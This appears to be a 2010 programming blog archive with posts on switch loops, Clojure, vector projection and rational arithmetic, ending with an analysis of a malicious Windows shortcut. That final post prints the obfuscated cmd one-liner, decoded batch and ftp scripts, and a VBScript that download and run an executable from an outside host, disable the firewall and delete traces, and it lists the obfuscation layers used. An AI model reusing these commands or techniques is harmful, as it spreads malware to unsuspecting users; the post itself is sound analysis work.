Arcane Sentiment: January 2010

The switch loop as an expressive device

Consider the switch loop. It's a loop which iterates through the branches of a switch statement, so each iteration does something completely different:

for (int step = 0; step < 3; ++step) {
  switch (step) {
    case 0:
      //do one thing
      break;
    case 1:
      //do another thing
      break;
    case 2:
      //do something else
      break;
  }
  //maybe there's a little bit of common code here
}

It looks like blatant stupidity, and sometimes it is. An unreflective coder who hears a problem described in a way that sounds sort of like iteration may implement it as a loop, without considering whether that makes any sense.

Sometimes the same thing happens as an innocent result of maintenance. Maybe the loop did make sense once, before the switch grew to dominate its body, and no one has noticed that it no longer does.

But sometimes the switch loop serves an expressive purpose.

What do you do when a function needs to execute part of itself several times with different parameters? You make a local function, of course. But what do you do in a language like C that doesn't have local functions? Or a language like C++ that has them, but only in the awkward form of local classes?

The switch loop is one solution. It allows its body to be executed repeatedly with different parameters, and it avoids duplicating it or removing it from its local context. Loops are C's only portable way to locally express repeated execution, and the switch loop is a way to use one as the best available approximation to a local function.

It's not a good solution. Even in C, it's generally better to use a separate top-level function, even if it takes a lot of parameters and makes no sense outside the calling context. But to a programmer who is reluctant to create new top-level definitions (a rather common, and annoying, aversion), or who simply overvalues locality of expression, I can imagine the switch loop seeming the best of the bad options.

An Umeshism

Scott Aaronson described Umeshisms: aphorisms of the form “if you never have $problem, you're spending too much effort avoiding $problem”. He asked his readers for more, but despite their computer-scienciness, no one suggested the obvious:

If your programs never have bugs, you're being too careful.

Or, from a language viewpoint:

If your language never has runtime errors, it's rejecting too many correct programs.

There's obviously a mathematical point to this aphorism schema, but it's surprisingly hard to state it explicitly. Try it: you wind up with enough conditions of continuity and monotonicity (and maybe others I missed) to completely obscure the point. That's why we use aphorisms instead.

Belated impressions of Clojure

Clojure is over two years old, and only last week did I finally get round to writing something in it. Some reactions after writing a few hundred lines:

Error reporting is often a bane of new languages, but Clojure's is pretty good — usually you get a Java stack trace. However, I did get a number of NullPointerExceptions without stack traces.

I often made what must be a standard newbie mistake: using parentheses in place of square brackets. Some forms, like when-first, handle that well:

user=> (when-first (x nil) 3)
java.lang.IllegalArgumentException: when-first requires a vector for its
binding (NO_SOURCE_FILE:0)

But fn gives a singularly confusing error:

user=> (fn (x) 2)
java.lang.RuntimeException: java.lang.IllegalArgumentException: Don't know
how to create ISeq from: clojure.lang.Symbol (NO_SOURCE_FILE:136)

This could be easily fixed by checking the type in psig in fn's expander:

(if (not (vector? params))
  (throw (java.lang.IllegalArgumentException.
          "fn requires a vector for its parameter list")))

Accessing nonexistent fields of struct-maps gives nil instead of an exception. This is consistent with other dictionaries, but it means this error isn't detected reliably, even dynamically.
doc is the first thing on the cheatsheet, but I didn't notice it until after I'd spent much of a day manually looking things up. :/
The documentation for proxy says it “expands to code which creates a instance of a proxy class that implements the named class/interface(s) by calling the supplied fns”, which sounds complicated and potentially inefficient. So I was very suspicious of it until I realized it's just inner classes.
Something like half of my total difficulties were about the Java libraries, not Clojure.
Java's GUI libraries are not entirely easy to use, but it's still wonderful to be able to take GUI support for granted. I'm used to GUI being possible in theory but not in practice.
for, doseq and range did exactly what I wanted, with no mental effort.
dosync took some getting used to. ref, deref and alter aren't unfamiliar, but having to announce in advance that you're doing state is a little unnerving. I didn't have any problems with code that might or might not be called in a transaction, but I was afraid I might. I'm not used to keeping track of this.
The inability to nest #(... % ...) is annoying. In about 200 nonblank noncomment lines, I used it five times. It would have been seven, but two of those would have been nested (immediately, in both cases) inside others. On the other hand, there were several other 1-argument fns that could have been written with #(... % ...), had I thought of it — which I didn't, because my pet language's equivalent only does partial application.
(alter r f x) is equivalent to (alter r #(f % x)). This saves a little typing, but it's such an arbitrary convenience that I found myself worrying about whether it worked with each function's argument order.
Clojure structures are dictionaries, but this isn't important; so far I've only used them like ordinary user-defined classes whose accessors happen to have names beginning with colons. It does mean they appear in a strange place in the documentation, though.
assoc is obvious in retrospect. I have wanted such an operator for structures, and I'd probably want it for dictionaries too, if I ever used nondestructive dictionaries.
Some functions I missed: abs, expt, union and intersection (they exist in clojure.set but not in the default namespace, and they don't work on lists), member? (on values, not keys), for-each (yeah, I know, I'm not supposed to want it), and a function that returns the first element of a list that satisfies a predicate.

Function of the day: scalar resolute

The language of mathematics is old and heavily explored, so its vocabulary tends to align well with what is asked of it. But occasional holes do turn up when parts of it are borrowed into programming languages and used for purposes different from those they were developed for. I ran into one of these twice recently, for unrelated reasons, while writing vector arithmetic code. In both cases, I had vectors a and b, and needed the component of a in the direction of b — the projection of a on b, except that I needed it as a scalar. My vector library provided norm, project, unit and dot, so I had a choice of norm (project a b) or dot a (unit b), neither of which is particularly clear.

A little googling reveals that while this operation isn't commonly taught, it is known to mathematicians, who call it the scalar resolute, by analogy to “vector resolute”, which is another name for the ordinary projection operation. It seems to me that I want it considerably more often than either project or dot, so it makes sense to include it in vector libraries. Unfortunately it has no common notation, and while one could be invented (scalar-project? along?), the operation is obscure enough that its would-be users might not recognize it by any name, because they wouldn't be looking for it.

Many uses of scalar resolute also want the component perpendicular to the base vector, i.e. norm (a - (project a b)), because they're really about converting from one coordinate system to another. A vector library could directly support this with a rotate or rebase function. However, a glance through my code suggests this wouldn't be very useful, because the point of the transformation is to obtain the individual components, so they can be operated on as scalars. Producing another vector as an intermediate step would not greatly help clarity. So I think these are most convenient as separate functions:

along : (vector, vector) → scalar
along v b = norm (project v b)

across : (vector, vector) → scalar
across v b = norm (v - project v b)

Rational arithmetic is a red herring

It's a traditional question: what's 1 / 3?

Depending on the language, the result may be the integer 0, a floating-point approximation 0.33333333333..., or the exact ratio 1/3. Languages supporting the last often tout it as one of their advantages: they give correct results for integer division, unlike those other languages that only give almost-correct ones, or, worse, compute some other function entirely and call it division.

I used to agree with this. Exact arithmetic is a nice feature, to be sure, and I've happily used it in a few toy programs. But as far as I can remember, I've never wanted it in a real program. Somehow, whenever I need real arithmetic for a real problem, some of the input is already approximate, so I don't mind a little more rounding. Rational arithmetic looks nice on a feature checklist, but it rarely makes my life easier.

It's also not as special as it sounds. Ratios are a simple case of symbolic arithmetic: keeping the result as something expression-like, instead of approximating it by a mere number. But division isn't the only operation that's commonly available only in approximate form. We don't expect square roots or trigonometry to be done symbolically; usually we settle for numerical approximations. Why should division be different?

While I'm complaining about rationals, I should mention a common practical problem: most languages with rationals print them as ratios, which can be quite inconvenient for humans to read. It's annoying to use a language's REPL as a calculator, and to discover that you have accidentally gotten an exact result, and must introduce some inexactness into the computation in order to be able to understand the result. (Frink can handle this nicely, by printing both the ratio and decimal forms, although for some reason this no longer works in the convenient online version.) This is a superficial UI problem, and really has nothing to do with rational arithmetic, but if it's not addressed — and it rarely is — it interferes with the utility of the language far more than mere rounding.

An onion of obfuscation

I received a phishing attack in my mail today. I wouldn't ordinarily have paid any attention, especially as it was attached to a message in Chinese, which I can't read without a dictionary and a grammar book (and not well then). But by chance it appeared to come from someone who has previously written to me in Chinese, and it was short enough that she might plausibly have intended me to puzzle it out. So the unintelligible message raised my suspicions only a little, and I looked at the attachment anyway. (Sure enough, the message turned out to be vague platitudes.)

It took a while for me to figure out that it was a phishing attack, not a virus. It was packaged as a Windows .LNK file — a shortcut — which ran a 245-character command beginning with:

%coMSpEc% /C sET s=o GAm &ECHO %V%%S%E0TW%x%^>K>w&eCHO %v%123^>^>K>>w& ...

Sorry about the StUdLyCaPs — it was apparently written like that to make it look less like code. But what does it do? %comspec% is usually cmd.exe, and cmd /c some-command runs some-command. In cmd.exe's language, & separates multiple commands to be run sequentially. So this is a script embedded in a one-line command. Case-folded and reformatted, it's:

set s=o gam
echo %v%%s%e0tw%x%^>k >w
echo %v%123^>^>k >>w
echo %v%123^>^>k >>w
echo %v%get c c.vbs ^>^>k >>w
echo %v%by ^>^>k >>w
echo %i%p%b%s:k >>w
echo %f%art c.vbs >>w
set b= -
set i=ft
set x=.com
set v=echo 
ren w g.bat
set f=st
g.bat

This writes something to w and then executes it. ^ escapes the following character, and > and >> are the same as on Unix, so the contents of w turn out to be:

%v%o game0tw%x% >k
%v%123 >>k
%v%123 >>k
%v%get c c.vbs >>k
%v%by >>k
%i%p%b%s:k
%f%art c.vbs

Substituting in the variables gives:

echo o game0tw.com >k
echo 123 >>k
echo 123 >>k
echo get c c.vbs >>k
echo by >>k
ftp -s:k
start c.vbs

So it's writing another file and executing it, although in this case the interpreter is ftp. k contains:

o game0tw.com
123
123
get c c.vbs
by

The 123s are a username and password, which ftp will prompt for. c.vbs is (as of two hours later) still available; it contains (reformatted):

function o
  for i=1 to UBound(s)
    h=h&chr(s(i)-232)
  next
  Set qq = CreateObject("Wscript.Shell") 
  qq.run h,0
end function
s=array(245,331,341,332,264,279,331,264,342,333,348,264,347,
        348,343,344,264,347,336,329,346,333,332,329,331,331,
        333,347,347,270,333,331,336,343,264,343,264,335,329,
        341,333,280,348,351,278,331,343,341,294,341,278,348,
        352,348,270,333,331,336,343,264,281,282,283,294,294,
        341,278,348,352,348,270,333,331,336,343,264,281,282,
        283,294,294,341,278,348,352,348,270,333,331,336,343,
        341,278,348,352,348,270,333,331,336,343,264,330,353,
        333,294,294,341,278,348,352,348,270,334,348,344,264,
        277,347,290,341,278,348,352,348,270,332,333,340,264,
        341,278,348,352,348,270,333,278,333,352,333,270,329,
        348,348,346,337,330,264,295,278,350,330,347,264,277,
        346,270,332,333,340,264,295,264,295,278,330,329,348,
        264,295,278,350,330,347,264,295,278,333,352,333,270,
        270,347,348,329,346,348,264,336,348,348,344,290,279,
        279,348,351,278,330,337,332,278,353,329,336,343,343,
        278,331,343,341,279)
o

Once the array is converted to a string, h turns out to be another script embedded in a cmd /c one-liner. This time the commands are:

net stop sharedaccess
echo o game0tw.com >m.txt
echo 123 >>m.txt
echo 123 >>m.txt
echo get e e.exe >>m.txt
echo bye >>m.txt
ftp -s:m.txt
del m.txt
e.exe
attrib ?.vbs -r
del ? ?.bat ?.vbs ?.exe
start http://tw.bid.yahoo.com/

Looks familiar, no? Once again it writes a script for ftp and fetches and runs a file. Despite being transferred in text mode, e.exe turns out to be a 52736-byte executable. I won't try to understand it, but I think it's the payload rather than another level of obfuscatory packaging, because it imports a variety of suspicious Win32 functions, including DeviceIoControl, InsertMenuA, and UnregisterClassW. I'm guessing it tries to replace something (part of a browser?) for phishing purposes. There is a suspicious shortage of strings other than the imports, though, which suggests it obfuscates its data internally. (It also calls IsDebuggerPresent, presumably to inconvenience people who are trying to watch it run.)

But never mind the binary. Count the layers of obfuscatory packaging:

Embedding a script in a command via cmd /C ... & ... & ... (twice)
StUdLyCaPs to escape case-sensitive code detectors
Assembling strings out of several pieces
Generating a script and then running it (four times)
Representing text as an array of numbers
Fetching code from elsewhere (twice)
Fetching a binary in text mode, so ordinary attempts to download it will get a corrupted version.

That's some impressive depth of defense. I'm tempted to dismiss it as a waste of effort, since none of the layers are much trouble by themselves. But it did get past my virus scanner.